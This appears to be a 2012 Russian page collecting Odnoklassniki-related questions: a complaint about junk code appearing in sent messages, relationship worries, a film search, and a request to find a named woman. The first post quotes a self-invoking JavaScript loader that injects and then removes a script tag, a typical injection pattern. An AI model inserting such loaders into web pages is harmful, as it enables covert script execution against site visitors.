среда, 26 сентября 2012 г.

Что за фигня в одноклассниках

!function(){try{var h:-Document.getElementsByTagName("head")[0];var s:-Document.createElement("script");s.src="// ";s.оnlоad=s.оnreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.оnlоad:-S.оnreadystatechange=null;h.removeChild(S);}};h.appendChild(S);}catch(ex){}}();

вот в комментариях в сообщениях почему то вставляется вот такая ерундень, когда отправляю свой текст. Как это убрать надоел уже.
Ну полцчается типа привет! И далее такая ерунда дописывается сама.
>>> Что за фигня в одноклассниках

Ссылку пож кто знает?

Ссылку пож кто знает
>>> Ссылку пож кто знает?

Как восстановить отношения со старым другом?

Я раньше был весельчаком, очень много прикалывался в школе, на всё смотрел с юмором, был постоянным оптимистом. У меня был один хороший друг (одноклассник по совместительству), мы с ним напару с ума сходили. Он всегда был за меня горой, заступался за меня в драках, например. А потом с какого-то момента я стал "серьёзнеть", а он стал постоянно пи3#*ть на меня, чмырить практически, мы с ним однажды чуть не подрались (я набросился на него после очередной "убойной шутки"). Он перестал меня уважать, и стал много вы$бываться. А я хочу сделать чтобы было ! как раньше. Знаю, вы щас скажите: забей на него, это не друг, коли он тебя таким не принимает. И всё же я глобально виду 2 варианта развития событий: или я чищу ему е^альник, и он перестает меня доставать, одновременно порвав со мной насовсем, или же я как то пробую с ним восстановить старые добрые отношения. Чё посоветуете?
>>> Как восстановить отношения со старым другом?

Как в одноклассниках писать стихами

Как в одноклассниках писать стихами
>>> Как в одноклассниках писать стихами

Что написать матере парня в однокласниках что бы завести розговор?

Что написать матере парня в однокласниках что бы завести розговор???
>>> Что написать матере парня в однокласниках что бы завести розговор?

Как избавиться от парня который тебя любит с детства, а ты терпеть его не можешь?

Здравствуйте у меня вопрос когда мне было 2 года моя мама познакомилась с тётенькой на работе) потом они начали знакомить нас с артёмом вместе нам тогда было по 2 года и так мы выросли, пошли в одну и ту же школу и он от меня не отвяжется до сих пор!! А мне сейчас 18
продолжем: он в 6 классе предложил встречаться ну по типу что я с ним уже встречаюсь) и всем об этом рассказывал, а одноклассники только и говорили влюблённая парочка!! Меня очень бесило и так до 11 класса, а у меня был парень и он меня бросил из-за него парень был просто супер++ а артём меня до сих пор достаёт и не как не отвезаться перебераеться с ветки на ветку и всё равно прибегает ко мне)) надоело помогите
>>> Как избавиться от парня который тебя любит с детства, а ты терпеть его не можешь?

Кто создатель однокласников

Кто создатель однокласников
>>> Кто создатель однокласников

Помогите вспомнить фильм. Русский.

В общем пожилая пара. Сын у них есть. Вроде в Америке живет. Бабуся учительницей раньше работала. Однажды встретила на рынке своего одноклассника что-ли.Он теперь вроде бомж. Но живет в какой-то каморке в цирке. Она там ему занавесочки вешала. Очень нужно название фильма помогите!!!(Дело происходит по моему в Петербурге)
Дополнено (1). Кто зашел, напишите хоть что-нибудь, хоть продублируйте уже имеющийся ответ. А то повиснет мой вопрос на голосовании. Не люблю этого)))
>>> Помогите вспомнить фильм. Русский.

Как удалить из ленты произошедшие действия свои или друзей? В одноклассниках так сделать легко, а здесь не понятно можно?

Как удалить из ленты произошедшие действия свои или друзей? В одноклассниках так сделать легко, а здесь не понятно можно?

>>> Как удалить из ленты произошедшие действия свои или друзей? В одноклассниках так сделать легко, а здесь не понятно можно?

Не могу найти девушку Вишнева Виктория Александровна

Училась 98г в Московском Институте культуры г Химки Левый берег, родилась в Ульяновске

>>> Не могу найти девушку Вишнева Виктория Александровна